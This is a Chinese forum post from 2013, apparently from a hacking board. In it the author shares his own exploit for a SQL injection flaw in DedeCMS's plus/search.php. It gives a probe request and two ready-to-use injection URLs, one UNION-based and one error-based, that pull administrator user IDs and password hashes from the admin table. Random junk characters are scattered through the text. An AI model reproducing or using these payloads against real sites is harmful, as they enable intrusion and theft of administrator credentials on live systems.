转载不加作者名的没JJ
7 s0 f8 X# ^% U: _: J6 R9 v/ T3 k5 L* U3 g. @: Y
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。3 ^3 g+ L, m; w9 \7 H" `' G
8 P6 l ?8 n% F8 D/ ]3 t. Q既然已经发出来了,我就把我自己搞的exp发下吧。。唉。" u8 h- R4 s; u, N! u
. i1 Q+ N6 \* W. o我一般是这样测试的:
6 y8 h! e# I* O3 z7 B
# }% _4 _$ u! [- q% V提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a! q( I* k* ?( J" b/ u/ X
( A" ]' o1 j, f; N- `转载不加作者名的没JJ
: C! C/ V- p8 B1 E5 Q9 j: J
0 v9 p# b+ K4 v( D1 ?) ^. U8 f8 U作者:鬼哥5 s+ _5 J% A/ D1 V; t
7 o% n+ }+ d! D% U
% b3 X8 h/ ?$ J& B4 y( v$ P1 \$ m( A! `" l) z& ^8 f/ R; ^
看结果如果提示% w/ x ^4 u1 H! K
6 m" R! [' K7 u" Z t$ f. K" gSafe Alert: Request Error step 2 !
3 a4 O/ w/ D1 C/ [+ W) _0 F* E5 |% T0 I; U" @& }
那么直接用下面的exp9 v4 f& M* v6 T0 ^$ P
, j1 |0 Z2 K3 ^ Z) `6 w+ P% G
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
/ e Y! t' {! Y: ~, B0 Q5 m4 A1 v& n9 D; r6 E( n! C7 D {
+ O; q2 G9 C: W
看结果如果提示* e& V9 ^% C) q" f; w# X. C
! m; z( T( X0 L
Safe Alert: Request Error step 1 !& A! h" @+ M8 C. a
( O9 ] I' u' e
那么直接用下面的exp4 f' G+ m' Z% [% `3 o
7 f+ r @+ g1 ^& nxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a+ j3 D1 L+ O# e6 L& J
) ^: _7 q7 ]/ Y) n+ E
$ h/ o5 Y1 w0 u+ o$ v/ k! N H
如果正常显示证明漏洞不存在了。# ~$ [$ l' g% e) U
5 f& }2 ` d, D+ M. C5 [转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对